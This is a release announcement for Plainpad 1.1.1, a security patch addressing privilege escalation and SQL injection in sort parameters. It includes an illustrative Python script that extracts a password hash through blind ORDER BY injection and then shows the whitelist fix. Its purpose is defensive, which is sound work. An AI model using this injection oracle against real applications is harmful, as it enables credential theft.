Plainpad 1.1.1 Released — Important Security Fixes

Plainpad 1.1.1 is now available. This is a security-focused patch release that addresses several issues we strongly recommend every administrator apply as soon as possible. There are no breaking changes — it’s a drop-in update over 1.1.0.

What’s Fixed

Privilege-escalation vulnerability (#138)

The most important fix in this release closes a privilege-escalation hole that allowed any authenticated user to grant themselves administrator rights. If you’re running a multi-user instance — especially one open to registration — you should update immediately and audit your user list for unexpected admin accounts.

Hardened password recovery

The password recovery endpoint has been reworked to prevent two related abuses:

Safer sorting on list endpoints

The user and note list endpoints now whitelist both the sortable columns and the sort direction. Previously, the sort column and direction taken from the request could be concatenated unsanitised into the ORDER BY clause, a SQL injection vector that parameter binding cannot cover because identifiers and keywords are not bindable values. With a whitelist, only a fixed set of known column names and the two directions ever reach the query text, which removes that class of issue entirely.
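To make the class of issue concrete, here is an added, illustrative example (not Plainpad's own code, and not its schema) written in Python against an in-memory SQLite database with constructed sample rows. The first endpoint interpolates the request's sort parameters directly into ORDER BY; an attacker who controls only the sort expression can infer a secret from another table one character at a time, purely from the order rows come back in. The second endpoint applies the whitelist approach described above, so the request string never reaches the SQL text.

```python
import sqlite3

# Constructed sample data for this example; column and table names are assumptions.
SECRET_HASH = "$2y$10$abcdefghijklmnopqrstuv"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT);
        CREATE TABLE notes (id INTEGER PRIMARY KEY, title TEXT, created_at TEXT);
    """)
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET_HASH,))
    conn.executemany("INSERT INTO notes VALUES (?, ?, ?)", [
        (1, "Grocery list", "2024-01-03"),
        (2, "Meeting notes", "2024-01-01"),
        (3, "Ideas", "2024-01-02"),
    ])
    return conn


# BEFORE: sort column and direction are concatenated straight from the request.
# Bound parameters cannot stand in for identifiers or keywords, so the attacker
# effectively writes the ORDER BY clause.
def list_notes_vulnerable(conn, sort: str, direction: str) -> list:
    sql = f"SELECT id, title FROM notes ORDER BY {sort} {direction}"
    return [row[0] for row in conn.execute(sql)]


# Boolean inference through the vulnerable endpoint: if the admin's secret starts
# with `prefix`, the CASE sorts by id (ascending order); otherwise by -id.
def oracle(conn, prefix: str) -> bool:
    payload = (
        "(CASE WHEN (SELECT password_hash FROM users WHERE id = 1) "
        f"LIKE '{prefix}%' THEN id ELSE -id END)"
    )
    ids = list_notes_vulnerable(conn, payload, "ASC")
    return ids == sorted(ids)


def recover_secret_prefix(conn, length: int, alphabet: str) -> str:
    """Extend the known prefix one character at a time using only row order."""
    found = ""
    for _ in range(length):
        for ch in alphabet:
            if oracle(conn, found + ch):
                found += ch
                break
        else:
            break  # no character in the alphabet matched; stop here
    return found


# AFTER: whitelist both the column and the direction. Only values from these maps
# are ever interpolated; the request string is used solely as a lookup key.
SORTABLE_COLUMNS = {"id": "id", "title": "title", "created_at": "created_at"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_notes_hardened(conn, sort: str = "id", direction: str = "asc") -> list:
    column = SORTABLE_COLUMNS.get(sort)
    order = SORT_DIRECTIONS.get(direction.lower())
    if column is None or order is None:
        # Reject rather than guess; silently falling back to a default sort
        # is also acceptable, as long as the request string is never used.
        raise ValueError("unsupported sort parameter")
    sql = f"SELECT id, title FROM notes ORDER BY {column} {order}"
    return [row[0] for row in conn.execute(sql)]


def rejects(conn, sort: str, direction: str) -> bool:
    """True if the hardened endpoint refuses the given sort parameters."""
    try:
        list_notes_hardened(conn, sort, direction)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    alphabet = "$0123456789abcdefghijklmnopqrstuvwxyz"
    print("leaked via ORDER BY:", recover_secret_prefix(db, 6, alphabet))
    print("hardened, by created_at:", list_notes_hardened(db, "created_at", "asc"))
    print("hardened rejects injection:", rejects(db, "(CASE WHEN 1=1 THEN id ELSE -id END)", "asc"))
```

The inference works with no error messages and no extra columns in the response, which is why "it only controls the sort order" is not a mitigating argument; any expression the database will evaluate in ORDER BY is a query the attacker runs with the application's privileges.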

User modal validation

The user modal in the admin UI now applies form validation rules, catching invalid input on the client before it reaches the server and giving administrators clearer feedback when something is wrong. This is a usability improvement, not a security boundary: client-side checks can be bypassed by anyone who talks to the API directly, so server-side validation remains the authoritative control.

How to Update

Grab the new release from GitHub:

Then follow the standard Updating guide to apply it to your instance. If you’re running Plainpad with Docker, pull the latest image — see the Docker documentation for details.

Because of the privilege-escalation issue, we recommend updating at the earliest opportunity, even if your instance is only used internally.

Reporting Security Issues

If you believe you’ve found a security issue in Plainpad, please report it responsibly via the channels listed on the Support page rather than opening a public issue. We appreciate every report — they make the project safer for everyone.

Thanks to everyone who reported, reviewed, and helped fix the issues in this release.